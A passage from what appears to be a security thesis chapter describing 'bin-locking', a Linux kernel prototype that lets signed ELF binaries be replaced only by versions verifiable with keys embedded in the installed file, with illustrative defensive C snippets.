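    /* Hypothetical descriptor of one signature sub-record inside the file. */
    typedef struct {
        size_t offset;    /* byte offset of the signature data within the file */
        size_t length;    /* length of the signature data                      */
    } sig_range_t;

    /* Placeholder standing in for the real digest (e.g. the hash used by DSA). */
    static void digest(const unsigned char *buf, size_t len, unsigned char out[32])
    {
        memset(out, 0, 32);
        for (size_t i = 0; i < len; i++)
            out[i % 32] ^= buf[i];          /* not a real hash function */
    }

    /* Hash the whole file with every signature sub-record zeroed out. */
    int bl_signed_digest(const unsigned char *file, size_t file_len,
                         const sig_range_t *sigs, size_t num_sigs,
                         unsigned char out[32])
    {
        unsigned char *copy = malloc(file_len);
        if (copy == NULL)
            return -1;
        memcpy(copy, file, file_len);
        for (size_t i = 0; i < num_sigs; i++) {
            if (sigs[i].offset + sigs[i].length > file_len) {
                free(copy);
                return -1;
            }
            memset(copy + sigs[i].offset, 0, sigs[i].length);
        }
        digest(copy, file_len, out);
        free(copy);
        return 0;
    }

Because every key (and key prefix) falls inside the hashed range, appending a new signature or key necessarily invalidates all existing signatures, which is the property relied on above.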
To ensure that bin-locked files remain visible on the file-system, we must ensure that a new file-system is not mounted over top of bin-locked files, and that a file-system containing bin-locked files is not unmounted unexpectedly. We first recognize that the mounting and unmounting of file-systems is not commonly performed (or at least does not affect core system directories) after system boot. We therefore modify the kernel to prevent mounting and unmounting of file-systems on specific paths. In the prototype, the list of such paths to protect is fully customizable by the user or machine administrator, being set as part of the boot process (however once a path is specified, it cannot be removed from the list of specified paths). We discuss the specifics of the prototype in the implementation section later in this chapter.
To rule out an easy way to subvert the proposed protection mechanism, we must also disable raw disk access to those partitions containing bin-locked binary files. This is discussed elsewhere in this thesis.
If deleting application binaries were still allowed, the bin-locking system would be rendered ineffective; the attacker could simply delete the binary and then install a new one. Therefore, in a system supporting bin-locking, signed application binaries may not be deleted. To delete bin-locked files in the proposed system, the bin-locking protections must be disabled. In the prototype, this requires a reboot into a kernel which does not enforce the protection mechanism (see the prototype implementation section later in this chapter). Previous work on providing a trusted interface – one which cannot be subverted by malware – between the kernel and the user may help to eliminate the reboot requirement. One solution (not implemented in the prototype) is to tie enforcement of bin-locking to whether or not a hardware token is inserted (similar to a mechanism proposed by Butler et al.) – as long as the hardware token is inserted, moves and deletes of signed binary files would be allowed.
We believe previous proposals which attempt to limit changes to binaries on disk all fall short for one of three reasons: they either detect changes after they have happened (making recovery hard), rely on the user to correctly validate every file modification (imposing usability issues), or still allow applications to modify any file at all during install/upgrade. Bin-locking addresses these three points and yields additional benefits, as explained in the following sections.
No Central Key Repository or Infrastructure
The proposed system differs from other code-signing systems currently in use in that it does not attempt to tie the signature to an entity. It can verify that the new version of an application binary was created by the same author (or organization) as the old version without knowing who the author is. Because the signature on a to-be-installed binary file is verified using the public key embedded in the previous version of the same file (by file name) installed on the system, there is no need to centrally register a key or involve any central repository. Thus, no central certification authority or public key infrastructure (PKI) is required. An application author can create a signing key-pair and begin using it immediately. Furthermore, if desired, different keys can be used for each file on a system, limiting the impact of a key compromise (as long as all private keys are not stored in one place the attacker gains access to, the attacker incurs a per-executable cost for replacing protected binaries). Because there is no dependence on a centralized trusted authority, development of new software remains unrestricted. We make no effort to restrict the software which can be installed on a system, as long as that software does not modify already-installed binaries. Other digital signature schemes proposed in the past have relied on a trusted central authority.
Trusted Software Base Even After Compromise
The legitimate operating system and core applications are normally installed before malware attempts to infect a machine. We exploit this temporal property. Typical malware, because it is installed after the operating system (including core libraries and programs), is not capable (if the proposed system is in place for operating system files) of changing any of the operating system files. The operating system files, therefore, can be trusted to be unmodified. If an anti-virus system is installed before any malware, the anti-virus binaries can also be automatically protected using the same mechanism. Core binaries on a compromised system can therefore be trusted, allowing much greater control over an infected system without requiring a reboot to clean media. Furthermore, this ability to reliably trust binaries on the system can make recovery easier. Using the proposed system, anti-virus software can be protected against modification and system binaries can be relied upon with confidence in their integrity, restricting the ability for malware to modify or filter the results of such applications in an attempt to hide. In the case of forensic analysis, while administrators may still choose to reboot to known-clean media once they discover malware, the inability for malware to hide is likely to result in the administrator becoming aware of the problem earlier.
Incremental Deployability with Incremental Benefit
Kernels which do not yet support the bin-locking mechanism will treat signed binary files as normal binary files, since the modifications made to a binary to support bin-locking are backwards compatible. Similarly, binaries without bin-locking digital signatures are allowed on a kernel which supports the proposal (in contrast to most proposed code signing schemes). Either the kernel or libraries can be updated to support bin-locking first without an adverse effect on non-supporting systems.
Low Overhead
As will be discussed later in this chapter, the prototype has a performance impact which is imperceptible to the end-user.
The bin-locking proposal is relatively simple to understand and does not require any additional hardware or co-processors. Because it is simple, developers are more likely to understand the protection mechanism. Also, the user is not involved in enforcing the protection mechanism, eliminating the risk of the security mechanism failing due to end-user error.
We now discuss some limitations related to deploying the proposed system. We note that many of these deficiencies can be addressed by combining the bin-locking approach with configd (the subject of the next chapter).
Denial of Service
Any attempt to install an application after malware is already on the system and has written bin-locked binaries (with different signatures) to the file names required by the application will result in a failed install. While this "limitation" may be viewed as an advantage from a security viewpoint, not all users will find that this improves usability. Currently, many users continue to use a computer after it has been infected with malware. They either are not aware that malware is there, or are not aware of the full implications of malware being on the system. Malware initiating such a denial of service attack will elicit a forced user response when an application install is prevented. At this point in time, the desire of the user to install an application is a security benefit in encouraging them to clean their system and remove the malware, including the files which resulted in the denial of service. We note that in order to take advantage of their desire to install an application, the process of removing the malware (including the reboot required in the prototype system) must be as simple as possible; the usability impact of this makes the proposal more suitable for some user environments than others, for example, for expert users, or users supported by technical experts.
The same user response is forced by malware performing a denial of service through filling the hard drive with bin-locked files which cannot be deleted (without a reboot). Both malware actions result in a state where the user (or their technical support team) is aware and forced to take action on installed malware. For malware that wishes to hide, it seems unlikely that either denial of service will be actively exploited.
Signed Binary Moves and Deletes
With the bin-locking system in place, file deletion and movement become much more complex. We cannot allow a bin-locked file to be easily moved or deleted since this would open up a method for allowing file replacement. We note, however, that application (and operating system) binaries seem to be rarely moved or deleted on a system. Furthermore, we believe (and personal experience seems to support) that users rarely uninstall applications. Statistics from the Debian popularity contest project indicate that for many applications, a large percentage of the people who have installed the application have not used it within the past month (e.g., 95.358% of people who have installed tuxkart have not used it in over a month according to data collected on March 6, 2010). For those times where an uninstall or move is required, a reboot into a different kernel would allow the operations to be performed. Again, we acknowledge that the usability impact of this makes the proposal in its present form more suitable for some user environments than others. We discuss reboots as they relate to the prototype implementation later in this chapter.
The proposed protection mechanism only protects binaries on disk. If malware can prevent the correct binary on disk from being invoked, then it may still take precedence over legitimate programs. As an example, running the ps command from the prompt without a pre-pended path (i.e., fully qualified file name) will cause the first copy of ps found to be run (even though it may not be the /bin/ps binary). While the bin-locking scheme is designed primarily to protect binaries against modification, bin-locked binaries provide no additional protection if they are not invoked. We must ensure therefore on an infected system that the legitimate binary can be easily run instead of one found at a location of the attacker's choice. Additional copies of binaries installed by malware can be avoided by running bin-locked applications directly, avoiding environment variables such as PATH. There are a number of methods for accomplishing this, including calling the kernel directly (e.g., using the execve system call) to run a program. Because much of the aliasing functionality is implemented by libraries likely to be protected by the bin-locking scheme, some aliasing vulnerabilities can be avoided (e.g., by restricting PATH to include only core system directories when running as root).
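As a generic POSIX illustration (not code from the prototype), a program can invoke a binary by its fully qualified name with a minimal, known-good environment, bypassing PATH lookup entirely:

    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        /* Fully qualified path: shell aliasing and PATH lookup are bypassed. */
        char *argv[] = { "/bin/ps", "aux", NULL };

        /* Minimal environment; PATH contains only core system directories. */
        char *envp[] = { "PATH=/bin:/usr/bin", NULL };

        execve("/bin/ps", argv, envp);
        perror("execve");                   /* reached only if execve fails */
        return 1;
    }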
While we want developers to use bin-locking for the applications they build, developer systems are not the design target of the developed applications. We discuss several developer features which currently remain enabled on all systems and undermine the security of bin-locking. We propose disabling these features on systems using bin-locking (e.g., end-user desktops) in order to increase security. We believe that typical end-users (as opposed to developers) will not be bothered by the following restrictions.
1. Ptrace hooks are used by developers to debug a running application. By allowing reads and writes to a process memory space, arbitrary changes to both data and code within the running application can be made. In order to ensure bin-locked binaries are run unmodified, ptrace access needs to be disabled for bin-locked binaries.
2. The customization of binaries by third parties is made much more difficult by bin-locking. The modification of binaries by third parties, however, is exactly the type of attack that bin-locking aims to prevent. Bin-locking ensures the software run by end-users is never modified by anyone other than those who developed the software. Developers wishing to switch between original software and custom builds (e.g., during debugging) will not be able to take advantage of the benefits of bin-locking for those binaries.
3. Preloaders on Linux such as LD_PRELOAD allow additional libraries not specified in an executable to be linked in at run-time. The use of preloaders thus provides a method for modifying a binary at run-time. There are two ways of preventing this from being exploited by attackers. The first (and easiest) is to disable LD_PRELOAD on non-developer machines (e.g., by installing a bin-locked /lib/ld-linux.so.2 not implementing the feature). The second defence against LD_PRELOAD comes through recognizing that it must be processed (indirectly) by the binary during start-up. If the LD_PRELOAD environment variable is ignored or reset to a known-good value (e.g., the empty string), the attack vector is disabled. While most applications leave the functionality intact (i.e., by calling the default /lib/ld-linux.so.2), the application developer can disable the functionality on binaries they intend to bin-lock (see the sketch after this list).
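The sketch referred to in item 3 follows. It is a hypothetical launcher, not part of the prototype, showing one way LD_PRELOAD (and similar loader variables) could be scrubbed before the real, bin-locked binary is started; the path of the real binary is illustrative.

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        (void)argc;

        /* Drop loader variables an attacker could use to inject libraries. */
        if (getenv("LD_PRELOAD") != NULL) {
            fprintf(stderr, "warning: dropping LD_PRELOAD\n");
            unsetenv("LD_PRELOAD");
        }
        unsetenv("LD_LIBRARY_PATH");

        /* Hypothetical location of the real application binary. */
        argv[0] = "/usr/libexec/myapp.real";
        execv(argv[0], argv);
        perror("execv");
        return 1;
    }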
Extensions to the Core Approach
Assuming a kernel supporting bin-locking has the basic capability of verifying that binary updates are authorized, other extended functionality may be worth considering. While we did not implement the following extensions in the prototype, we believe them to be useful extensions to the core idea; those discussed here would require additional support from the kernel.
As one possible extension to the system, version numbers could be embedded in both the old and new binaries. If the kernel limits replacement based on version number, the same public-private key pair could be used over an extended period of time without the risk of a downgrade attack (i.e., replacing a more recent binary with an older version containing a vulnerability). While authors (or organizations) can achieve the same effect by "revoking" keys (as discussed earlier in this chapter), versioning allows the software author to minimize the number of public keys which must be contained in any new version of the binary while still ensuring that the binary can replace many previous versions.
We acknowledge that rollback by legitimate users (the process of reverting software to a previous version) may not be possible while bin-locking enforcement is active on a system (since bin-locking, as outlined in this thesis, is designed to also prevent downgrade attacks).
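A minimal sketch of how a kernel supporting the versioning extension might gate replacement, assuming a hypothetical version field embedded (and signed) in each binary; this check would be applied in addition to the signature check of the base scheme.

    #include <stdbool.h>
    #include <stdint.h>

    /* Hypothetical bin-locking metadata extended with a version number. */
    typedef struct {
        bool     has_version;
        uint64_t version;
    } bl_version_t;

    /* Refuse replacement when the incoming binary carries a lower version
     * than the installed one, preventing downgrade to a vulnerable release. */
    bool bl_version_allows_replace(const bl_version_t *oldv,
                                   const bl_version_t *newv)
    {
        if (!oldv->has_version || !newv->has_version)
            return true;            /* extension not in use for this file */
        return newv->version >= oldv->version;
    }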
In the core idea, any binary which can be validated using signature verification public keys in the installed binary will be allowed to replace the installed binary.

To prevent one binary from replacing another binary with different functionality written by the same organization (preventing their software from working properly), the organization could use a non-overlapping set of keys for each binary. As an extension to the basic bin-locking idea, an organization could embed an index number into each binary they sign. New versions of the same binary would have the same index number; binaries for different applications developed by the same organization would have different index numbers. If the kernel enforces that the index number between the old and new binary must match, an organization could use the same private signing key for all their binaries (without allowing their binaries to be maliciously switched on a system). As an example, sub-keying could be used to prevent the contents of rm from being used in an update to ls while allowing the two binaries to be signed with the same key.
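Sub-keying could be enforced with an equally small check; the index field and its encoding below are assumptions for illustration.

    #include <stdbool.h>
    #include <stdint.h>

    /* Hypothetical per-binary index number chosen by the signing organization;
     * ls and rm signed with the same key would carry different indices. */
    typedef struct {
        bool     has_index;
        uint32_t index;
    } bl_index_t;

    /* A verifying signature is only accepted when the index numbers of the
     * old and new binary also match, so one product of an organization cannot
     * be swapped for another product signed with the same key. */
    bool bl_index_allows_replace(const bl_index_t *oldi, const bl_index_t *newi)
    {
        if (!oldi->has_index)
            return true;            /* extension not in use for this file */
        return newi->has_index && newi->index == oldi->index;
    }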
All Key Verification
The core approach of bin-locking states that a library file or executable on disk can only be replaced by a library or executable containing a digital signature verifiable using a public key in the previously installed binary having the same file name. Only one signature needs to be verified in order for the replacement operation to succeed.
An alternate approach is to require that either all signatures in the new version of the binary be verifiable using appropriate keys in the old version, or alternatively, that all keys in the old binary be used in the verification of the new binary (i.e., for each public key in the old binary, there is a corresponding valid signature in the new binary). While similar, the two approaches are different. We now discuss each.
Variation 1: Verifying All Signatures in the New Binary
In the base proposal, as long as at least one signature matches, we can conclude that the new version of the binary came from a trusted source. Variation 1 requires that all signatures present in the new binary verify using public verification keys in the old binary. Variation 1 is not much different from verifying a single signature from the perspective of restricting updates. If the enforcement policy is that all signatures present must verify in the new version, the developer of the binary could simply omit all but one signature, reducing the approach to the base single signature verification scheme (leaving only one signature that can be verified using a public key in the already-installed binary).
In variation 1, the developer needs to be able to add a public verification key without adding a corresponding signature to a new binary (i.e., signatures cannot be tied directly to keys, as done by jarsigner). Because any signature in the new version of a binary must have a corresponding public verification key in the old version, adding a new signature when any new key is added would result in a new binary which fails the verification check of variation 1. Our proposal uses key prefixes to allow the introduction of public verification keys without the introduction of associated signatures.
Variation 2: Verifying Using All Keys in the Old Binary
Variation 2 requires that for each public key embedded in the old version of a binary, there is a corresponding verifiable signature in the new version of the binary. This variation prevents a new version of the binary from being installed unless all groups holding private keys corresponding to the public keys in the installed binary sign the new binary. This approach can be used to prevent one developer from "going rogue" – taking over the application by distributing a new version only signed with their private key (even though the developer attempting to go rogue has a public key contained in the already installed version of the binary). This variation prevents a single compromised private key on a binary signed by multiple parties from being usable – the attacker would have to compromise all keys in order to replace the binary. The downside to this approach is that the non-malicious loss of even a single key (e.g., through hard drive failure) would result in no updates to the binary being possible.
Similar to variation 1 above, variation 2 requires that signatures can be added to the binary without adding the associated public verification key. If a signature cannot be embedded into the binary without also embedding the corresponding public verification key, a key could not be phased out of new versions of the binary while still having the variation 2 check pass. If version n is signed with private keys A, B, and C, then all future versions > n must also be signed with private keys A, B, and C unless signatures can be added without adding the associated verification public key. Our proposal uses key prefixes to allow the introduction of signatures without the introduction of associated public verification keys.
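The two variations differ only in which quantifier is applied to the embedded keys and signatures. The sketch below makes the distinction explicit; the types and the stub verifier are hypothetical (repeated from earlier so the snippet stands alone).

    #include <stdbool.h>
    #include <stddef.h>

    typedef struct {
        size_t num_pubkeys;      /* keys embedded in the binary       */
        size_t num_signatures;   /* signatures embedded in the binary */
    } binary_t;

    /* Stub: does signature s of 'newbin' verify under key k of 'oldbin'? */
    static bool verifies(const binary_t *newbin, size_t s,
                         const binary_t *oldbin, size_t k)
    {
        (void)newbin; (void)s; (void)oldbin; (void)k;
        return false;               /* placeholder for real verification */
    }

    /* Variation 1: every signature in the NEW binary must verify under some
     * key embedded in the OLD binary. */
    bool variation1(const binary_t *oldbin, const binary_t *newbin)
    {
        for (size_t s = 0; s < newbin->num_signatures; s++) {
            bool ok = false;
            for (size_t k = 0; k < oldbin->num_pubkeys && !ok; k++)
                ok = verifies(newbin, s, oldbin, k);
            if (!ok)
                return false;
        }
        return true;
    }

    /* Variation 2: every key embedded in the OLD binary must be matched by a
     * verifying signature in the NEW binary. */
    bool variation2(const binary_t *oldbin, const binary_t *newbin)
    {
        for (size_t k = 0; k < oldbin->num_pubkeys; k++) {
            bool ok = false;
            for (size_t s = 0; s < newbin->num_signatures && !ok; s++)
                ok = verifies(newbin, s, oldbin, k);
            if (!ok)
                return false;
        }
        return true;
    }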
Security Updates by Regular Users
The ability to restrict updates to only those files that are bin-locked with a verifiable signature presents another opportunity. On many systems, the user of the system is not the same individual as the administrator (especially in business and educational environments). By allowing updates to bin-locked applications, we can safely allow users to install patches without granting them administrator access. Bin-locking provides the mechanism to ensure a user only updates bin-locked binaries with new valid bin-locked binaries. Of course, allowing any user to update a binary with a new version is not appropriate in all environments. We therefore propose still using traditional file access control policies to dictate which users have permission to update a file in the first place. In the prototype below, we continued to enforce traditional access control policies (such as Unix discretionary file-system access controls) in addition to those of the bin-locking system.
A Prototype Implementation
To verify the viability of the bin-locking proposal, we modified a Debian 4.0 Linux system to implement bin-locking, including the kernel interface restrictions discussed elsewhere in this thesis. The prototype implementation is composed of a number of different pieces which together protect the system. We wrote a binary signing utility which is used along with associated custom scripts to sign the binaries in the Debian software archive (for Debian 4.0), creating a new local Debian mirror which we used for testing. We then installed these binaries on a test system using the Debian package manager, which we modified to support bin-locked binaries. The Linux kernel (version 2.6.25) on the test system was modified to enforce the proposed protection mechanisms (which include restrictions on bin-locked binaries as well as access to the kernel and file-systems). The boot process was modified on the test system to initialize kernel data structures which limit raw writes and mounting. We discuss each of these steps in detail below.
Extensions to the ELF Format
Executable files for a particular operating system normally follow a standard structure. Most Unix distributions (including Linux) use the binary format file ELF (Executable and Linkable Format). The basic ELF file is represented in Figure 5.1. Except for the ELF file header, all other elements are free to be arranged as desired. We modified ELF files (our approach could be adapted to other types of files not modified by the user – e.g., Windows executables, Windows libraries, or application data files), creating a new type of ELF section for storing bin-locking related data. The ELF binary file format was designed such that applications could create new sections, and many other applications (e.g., GCC and bsign) take advantage of this flexibility.

Figure 5.1. Basic ELF layout including bin-locking section.

The new bin-locking section of the ELF file is made up of one or more records (the section table contains a field specifying the number of records), each containing a type of digital signature (e.g., all elements related to the DSA algorithm would be in one record). Each record specifies a signing algorithm (type), signature, prefix of the public keys that can be used to verify the digital signature, and zero or more keys that are eligible to verify digital signatures of the same type in subsequent versions of the binary. The key prefix record contains the first four bytes of the public verification key related to the digital signature and is used for quickly determining what verification key in a previous version of the binary should be used for verifying the digital signature (if multiple keys share the first four bytes, the kernel will attempt to verify with each). We illustrate the layout of the bin-locking section in Figure 5.2.

Figure 5.2. Bin-locking file section layout.
To allow for future signature schemes, we included several additional variables and flags in bin-locking section headers. The header for records and sub-records was specified to include both a length and type field, allowing the modified kernel to skip over unrecognized signature types. The prototype's sub-record header, in addition, contains a flag that signals the kernel to zero the data part of the record when hashing the file; signatures are stored in sub-records with this flag set. We discuss the kernel verification of digital signatures further below. The layout of a sub-record is illustrated in Figure 5.3.

Figure 5.3. Layout of a sub-record in the bin-locking section (records are similar).
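One possible C rendering of the record and sub-record headers is given below; the field widths, ordering, and constants are illustrative assumptions rather than the prototype's exact on-disk layout.

    #include <stdint.h>

    /* Record header: one record per signature algorithm; the ELF section table
     * entry records how many records the bin-locking section contains. */
    struct bl_record_hdr {
        uint32_t length;        /* total length of this record, header included */
        uint32_t type;          /* signature algorithm, e.g. a constant for DSA */
        uint32_t num_subrecs;   /* number of sub-records that follow            */
    };

    #define BL_SUBREC_FLAG_ZERO_ON_HASH 0x1  /* zero the data when hashing the file */

    /* Sub-record header: length and type let an older kernel skip anything it
     * does not recognize; the flag marks signature data excluded from the hash. */
    struct bl_subrec_hdr {
        uint32_t length;        /* total length of this sub-record              */
        uint16_t type;          /* key prefix, public key, or signature         */
        uint16_t flags;         /* e.g. BL_SUBREC_FLAG_ZERO_ON_HASH             */
        /* ('length' - sizeof header) bytes of data follow: a four-byte key
         * prefix, a public verification key, or a digital signature. */
    };

    /* Illustrative sub-record type values. */
    enum bl_subrec_type {
        BL_SUBREC_KEY_PREFIX = 1,   /* first four bytes of the verification key */
        BL_SUBREC_PUBLIC_KEY = 2,   /* key eligible to verify future versions   */
        BL_SUBREC_SIGNATURE  = 3    /* signature over the file                  */
    };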
The kernel was modified to enforce bin-locking as discussed earlier in this chapter. Consequently, the modified kernel does not allow signed binary files to be deleted, moved, or opened for writing. They can only be replaced with new binary files that contain a signature verifiable using keys in the old binary. On a replacement request (which is initiated through a move kernel system call involving a bin-locked binary), the kernel attempts to extract the keys from the old binary and use them to verify the validity of the new binary. If the signature in the new binary successfully verifies, the kernel moves the new binary over top of the old binary. Using the move system call, however, presents a dilemma. The new binary must not be bin-locked (or the move will be denied), but at the same time it must be bin-locked (to replace the old binary). The prototype kernel deals with this by ignoring the first eight bytes of the new binary when performing movement validation checks (a feature used by the modified Debian package manager, discussed below). The addition of eight new bytes at the beginning of the ELF file changes it such that the kernel does not recognize it as bin-locked (for the purposes of preventing its movement and deletion) but still recognizes it as bin-locked (allowing it to replace another bin-locked file if the signature verifies). During the replacement, the kernel will first verify the signature on the new binary (ignoring the first eight bytes). If signature validation passes, the kernel will move the new binary over top of the old one, removing the initial eight bytes during the move (the file is locked to prevent it from being modified between signature validation and the move operation). The bin-locked binary resulting after the move is protected by the kernel. Because binaries currently being run cannot be modified on disk (in any Linux system), a move must be used (instead of a copy or other update mechanism) to replace bin-locked binaries. The prototype kernel retains backwards compatibility with binary files that are not bin-locked, not restricting their replacement or removal. Currently, the prototype kernel can verify application binaries signed using the Digital Signature Algorithm (DSA).
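The replacement flow can be sketched as follows. The eight-byte CODESIGN marker is the prototype's; the helper names and the user-space framing are hypothetical, since the real logic lives in the kernel's handling of the move system call.

    #include <stdbool.h>
    #include <stddef.h>

    #define BL_PREFIX     "CODESIGN"   /* marker prepended to the incoming file */
    #define BL_PREFIX_LEN 8

    /* Stubs for operations the modified kernel performs; all hypothetical. */
    static bool is_bin_locked_file(const char *path)
    { (void)path; return true; }
    static bool file_has_marker(const char *path)        /* contents begin with marker? */
    { (void)path; return false; }
    static bool signature_verifies(const char *newpath, size_t skip,
                                   const char *oldpath)  /* ignore first 'skip' bytes */
    { (void)newpath; (void)skip; (void)oldpath; return false; }
    static int  move_stripping_marker(const char *newpath, size_t skip,
                                      const char *oldpath)
    { (void)newpath; (void)skip; (void)oldpath; return 0; }

    /* Handle rename(newpath -> oldpath) when the target is bin-locked: verify
     * the signature while ignoring the eight-byte marker, then move the new
     * file over the old binary, stripping the marker during the move.  The
     * incoming file is locked between verification and the move. */
    int bl_handle_rename(const char *newpath, const char *oldpath)
    {
        if (!is_bin_locked_file(oldpath))
            return 0;                            /* ordinary rename semantics */

        size_t skip = file_has_marker(newpath) ? BL_PREFIX_LEN : 0;
        if (!signature_verifies(newpath, skip, oldpath))
            return -1;                           /* replacement refused */

        return move_stripping_marker(newpath, skip, oldpath);
    }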
We chose not to rely on a user space helper in designing the prototype system in order to simplify the implementation. While we believe a user space helper could be implemented securely, it would need to be bin-locked itself, and the interfaces it uses to talk to the kernel would have to be designed very carefully to avoid being susceptible to being taken over by malware. Even with keeping the entire implementation in the kernel, the number of new lines of code added to the kernel was around 2000.
Detecting Bin-Locked Files
To detect whether or not a file is bin-locked, the modified kernel examines very specific elements in the file. It verifies that the file: 1) is an ELF file, 2) contains a bin-locking section, and 3) in the bin-locking section there exists a digital signature in a format known to the kernel (currently, only DSA signatures are supported). To determine if a file is bin-locked, the kernel must read the file header (the first 52 bytes of the file on a 32-bit x86 platform) as well as the section table (40 bytes per section). If any element in either the file header or section header is considered invalid according to the ELF specification, the file is treated as not bin-locked. An attacker is not able to turn a bin-locked file into one not bin-locked because the kernel does not allow a properly bin-locked file to be altered (except by replacing it with another properly bin-locked file). The eight byte header described above results in a file that is not recognized as a valid ELF file and hence the modified kernel allows it to be removed, modified, and moved. We assume individuals attempting to bin-lock their own binaries will not purposely create invalid binaries (as that would negate the effort of bin-locking the binary in the first place). As part of the prototype, we created a tool to test that properly signed ELF files are recognized as valid. The overhead of enforcing bin-locking is imperceptible to end-users of the running system (a Pentium 4 at 2.8GHz with 1G of RAM), as discussed below.
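For illustration, roughly the same detection steps can be expressed in user space against a 32-bit ELF file using the structures from <elf.h>. The section is identified here by a hypothetical section name for simplicity, and the check for a recognizable signature format inside the section is omitted.

    #include <elf.h>
    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>

    #define BL_SECTION_NAME ".binlock"   /* hypothetical name of the bin-locking section */

    bool is_bin_locked(FILE *f)
    {
        Elf32_Ehdr eh;
        if (fread(&eh, sizeof eh, 1, f) != 1)
            return false;
        if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
            eh.e_ident[EI_CLASS] != ELFCLASS32)
            return false;                        /* not a valid 32-bit ELF file */

        /* Read the section header string table entry so names can be checked. */
        Elf32_Shdr sh, strtab;
        if (fseek(f, (long)eh.e_shoff + (long)eh.e_shstrndx * eh.e_shentsize, SEEK_SET) != 0 ||
            fread(&strtab, sizeof strtab, 1, f) != 1)
            return false;

        /* Walk the section table looking for the bin-locking section. */
        for (unsigned i = 0; i < eh.e_shnum; i++) {
            char name[sizeof BL_SECTION_NAME] = { 0 };
            if (fseek(f, (long)eh.e_shoff + (long)i * eh.e_shentsize, SEEK_SET) != 0 ||
                fread(&sh, sizeof sh, 1, f) != 1)
                return false;
            if (fseek(f, (long)strtab.sh_offset + (long)sh.sh_name, SEEK_SET) != 0 ||
                fread(name, 1, sizeof name - 1, f) == 0)
                continue;
            if (strcmp(name, BL_SECTION_NAME) == 0)
                return true;
        }
        return false;
    }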
Verifying Digital Signatures
To verify that a new binary can replace an already existing bin-locked binary, the modified kernel first extracts a list of verification keys from the old binary (those which share the same prefix as the key prefix stored in the new version of the binary alongside the digital signature). Using each verification key that matches the key prefix, the kernel attempts to verify the digital signature. If the verification passes, the replacement is allowed. If the binary contains two different types of digital signatures, the modified kernel will allow replacement if any one of them contains a verifiable digital signature.
While the prototype uses an older and less efficient implementation (space-wise) to store and verify digital signatures than described herein, the method proposed in this sub-section is preferred.
Avenues for Kernel Modification
To protect the bin-locking system itself, the kernel was also modified to remove known functionality which could be used to attack the system. The main such known attacks are 1) modifying the kernel to disable the protection scheme, 2) editing the bin-locked binaries directly on disk, and 3) hiding bin-locked binaries (by either mounting or unmounting the partitions they reside on). To prevent 1), we used the kernel protection mechanisms discussed elsewhere in this thesis. While we disabled module loading entirely, a better option is to deploy module-signing (as discussed by Kroah-Hartman). We also limited raw disk access and drive mounting (as discussed below).
Disabling Raw Disk Access
To protect bin-locked binaries against modification, one must also disable raw writes for partitions that contain bin-locked files (on both mounted and unmounted partitions). We did this by using the syscontrol mechanism described elsewhere in this thesis. As part of the boot-up process, the list of partitions for which raw disk access is disabled is written back into the syscontrol (after the initial fsck/file-system check). In order for malware to enable raw disk writes, it must modify the start-up process to disable initialization of the syscontrol and reboot the system. One solution to prevent this is to initialize the syscontrol in init (the first binary run). Binaries involved in the start-up process (including init) can be bin-locked, preventing modification.
In the implementation, the restriction on raw disk writes was implemented as a user-specified list because the kernel could not determine quickly what partitions contain bin-locked files. As an alternative, the file-system could be modified to include a flag indicating the presence of bin-locked files on that partition. If bin-locked files are present, then raw writes to the partition could be automatically disabled without the kernel needing a list. By avoiding file-system modifications, the prototype was able to operate at the security module layer, not depending on a particular file-system. By leaving the file-system unmodified, backward compatibility with systems not aware of bin-locking is also maintained.
To prevent bin-locked files from becoming inaccessible to user-space applications, the prototype restricts the locations where file-systems can be both mounted and unmounted using the same approach of a syscontrol which supports both read and write operations. By writing "< /usr/lib" to a syscontrol created by the prototype, the modified kernel enforces that no file-system can be mounted or unmounted at /usr/lib, /usr, or /, meaning that all files in /usr/lib continue to be accessible until the system is rebooted. By writing "> /usr/lib" to the syscontrol, no file-system can be mounted on any sub-directory or parent directory of /usr/lib (i.e., > implies <). File-system root rotations are also not permitted by the prototype if the syscontrol restricting mounts has been written to. Although both the new syscontrols support write operations, all writes to these syscontrols are converted to appends by the modified kernel and hence cannot be used to modify previous entries written to the bin-locking related syscontrols. Remounting partitions to enable and disable write access must be allowed, as this functionality is used during the normal shutdown process to avoid file-system corruption.
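The '<' and '>' semantics can be illustrated with a small path-matching sketch; the structure and the matching rules below are a simplified model of the prototype's behaviour, which is enforced by the modified kernel when a mount or unmount is requested.

    #include <stdbool.h>
    #include <string.h>

    /* One entry written to the (hypothetical) mount-restriction syscontrol:
     * "< /usr/lib" protects /usr/lib and all of its parents (/usr and /);
     * "> /usr/lib" additionally protects every sub-directory of /usr/lib. */
    struct mount_restriction {
        char mode;           /* '<' or '>'      */
        const char *path;    /* e.g. "/usr/lib" */
    };

    /* True when 'prefix' names 'path' itself or one of its parent directories. */
    static bool is_prefix_dir(const char *prefix, const char *path)
    {
        size_t n = strlen(prefix);
        return strncmp(prefix, path, n) == 0 &&
               (path[n] == '\0' || path[n] == '/' || n == 1 /* "/" */);
    }

    /* Would a mount or unmount at 'target' be refused under restriction 'r'? */
    bool mount_denied(const struct mount_restriction *r, const char *target)
    {
        /* '<' (and '>'): deny when target is the protected path or an ancestor. */
        if (is_prefix_dir(target, r->path))
            return true;
        /* '>': additionally deny when target lies underneath the protected path. */
        if (r->mode == '>' && is_prefix_dir(r->path, target))
            return true;
        return false;
    }

For example, with the entry "< /usr/lib", mount_denied() returns true for /usr/lib, /usr, and /, but false for an unrelated path such as /mnt.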
We currently see no easy method of avoiding the list of mount location restrictions. Administrators may require unmounting on devices containing bin-locked files (e.g., unmounting removable media). While it is possible to prevent mounting a new file-system over bin-locked files using a file-system flag (as discussed above), whether to prevent file-system unmounts depends on the environment.
Modifications to Executable Files
To bin-lock binary files, the prototype used binary rewriting. An application was created which would use one or more signing keys to sign an existing binary, injecting into the binary both the signatures and all the verification public keys related to the signature (we chose not to use bsign, preferring a simpler method). ELF files are used for both program executables and shared libraries – the bin-locking approach covers both. Currently, the signing application signs binaries using DSA, although this can be extended to other signature formats.
The modification of executables is backwards compatible. Signed (i.e., bin-locked) binaries can be used seamlessly on a system which does not understand bin-locking.
